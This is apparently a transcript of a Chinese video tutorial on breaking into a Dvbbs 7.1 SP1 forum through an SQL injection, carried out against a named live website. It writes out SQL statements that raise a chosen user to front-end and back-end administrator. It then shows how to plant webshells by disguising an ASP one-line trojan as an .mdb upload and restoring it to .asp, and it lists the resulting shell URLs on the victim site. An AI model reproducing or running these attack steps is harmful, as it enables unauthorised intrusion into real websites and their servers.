本想做成语音教程，可是在单位没有话筒，其实教程的质量和语音不语音的关系不大~~（我认为，嘿嘿）
大家仔细看我教程，一样可以掌握的。

多抽出一分钟时间学习.让你的生命更加精彩.
我挺喜欢这句话。人的生命只有一次，大家要好好把握哦~

大家好，我是蓝色火焰，今天给大家带来的是最近刚刚爆出的动网7.1 sp1 SQL版的漏洞——注入漏洞

漏洞文件是dv_dpo.asp，大家可以下载来仔细阅读，其实挺简单，一般人一看就懂~~

下面开始我们今天的课程

今天所用到的工具

1、动网0day

2、蓝鱼动网空数据库合并成伪ASP木马专用工具

3、ASP一句话木马、旁注小注手、ASP大马

目标网站：http://www.t.0579.net/bbs/index.asp

哦，已经打开了，呵呵
我们打开它，看看这个论坛的版本。。。

Copyright ?2000 - 2002 AspSky.Net
Powered By Dvbbs Version 7.1.0 Sp1
页面执行时间 0.06250 秒, 2 次数据查询

符合我们的要求。。。

随便找一个用户（用户名最好不是汉文的），guoyaxing 吧

下面 打开 动网0day

按照我的操作 大家看仔细了。。
先修改密码为admin888

看到了吧 已经改成admin888了哦
我们登陆看看
成功了，大家仔细看， 现在是普通会员，没有管理选项~~

下面
update [Dv_User] set UserGroupID=1 where username='guoyaxing'
提升为前台管理员

dvbbs恢复默认设置
动网默认风格
默认风格
秋意盎然
棕红预览
紫色淡雅
青青河草
橘子红了
红红夜思
粉色回忆
水晶紫色
guoyaxing 重登录隐身用户控制面板搜索 风格博客(Boke)论坛状态论坛展区道具中心管理退出

看到了吧？已经是前台管理员了，
insert into dv_admin (username,[password],flag,adduser) values ('guoyaxing','469e80d32c0559f8','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37','guoyaxing')
将guoyaxing加入后台管理员的行列，469e80d32c0559f8 是admin888的MD5密文

动网的 总是那么脆弱

看到了吧，登陆前台，进入后台。。。。


看！我们成功了，现在我们已经成功了一半了，呵呵

好了，我们开始拿webshell吧

动网7.1 sp1 sql 版的webshell拿法，主要思想就是用 蓝鱼动网空数据库合并成伪ASP木马专用工具
将一句话木马的服务端合并成mdb的格式上传，然后用本地提交的方式将mdb还原成asp,进而传小马，
传大马，最后提权获得system shell。。。

好看我操作：

首先更改前台允许上传的文件类型，加上mdb

我们来改 绿色之友 这个模块的设置
改爱心无限 吧
gif|jpg|jpeg|bmp|png|rar|txt|zip|mid|mdb 提交

然后生成mdb文件，前台上传,

生成mdb 需要用蓝鱼动网空数据库合并成伪ASP木马专用工具 和一句话服务端，看操作

合成完毕，我们前台上传~~

第一次超时了 呵呵
不过总算传上去了

我们从后台查看该mdb文件的路径http://www.t.0579.net/bbs/UPLOADFILE/2007-10/2007101723304599760.mdb
就是这个了~~

好了，重点来了，看仔细了！！

本地提交，恢复mdb为asp（这个是精髓，呵呵）

看好了
成功恢复数据！
http://www.t.0579.net/bbs/UPLOADFILE/2007-10/2007101723304599760.asp
这个就是我们的一句话服务端了
哈哈

成功！

用一句话客户端连接~~上传小马~~~
http://www.t.0579.net/bbs/UPLOADFILE/2007-10/value.asp 这是小马

E:web _0579_netwebbsUPLOADFILE�7-10dama.asp 这个就是大马了
就是：
http://www.t.0579.net/bbs/UPLOADFILE/2007-10/dama.asp

OK!

到这里，教程就要结束了

下面的提权拿服务器的操作因为不是今天的教程重点，留给大家做吧。

我的QQ:121087069 （拜师的勿加）
邮箱：bluefire-0824@163.com
新建的群：47702410

最后说，www.3800hk.com是个不错的站，我以前没注意，最近才注意到的（别笑我土哦），真的不错，想见恨晚，哈哈

大家一起帮忙宣传。。

这里也希望黑鹰给个邀请码
发QQ,邮箱均可

好了，下次见。。。。

• [VIP专用软件 - 电信高速下载][非高级会员不可下载]
• [VIP专用软件 - 双线高速下载][非高级会员不可下载]

• ☉ Delphi编程教学系列（新世纪网安基地VIP教程）
• ☉ virtualpc中的linux如何连上Internet
• ☉ ProE 2.0安装视频
• ☉ 学会利用系统自身资源
• ☉ JSP开发之一Servlet基础
• ☉ 内网架设DNS服务器详解
• ☉ 心动吧桌面图之serv-U反弹
• ☉ 小解TTL的妙用
• ☉ 免费的网络电脑
• ☉ 略施小计吓跑不怀好意的菜鸟

• ☉ 由于私服程序的特殊性，它非常容易被杀毒误报，所以自2011年1月起本站所有软件都不在做杀毒查杀，请下载后自行检测查杀！
• ☉ 为了达到最快的下载速度，推荐使用 迅雷5 下载本站软件。
• ☉ 本站软件均为WinRAR3.7版本压缩，所以请一定升级到WinRAR3.7或最新版才能正常解压本站提供的软件!
• ☉ 如果您发现下载链接错误，或内容与分类不匹配，请点击报告错误。正确报错10个我们将送您VIP会员！
• ☉ 如发现本站软件需要解压密码，均为：www.9876543210sf.com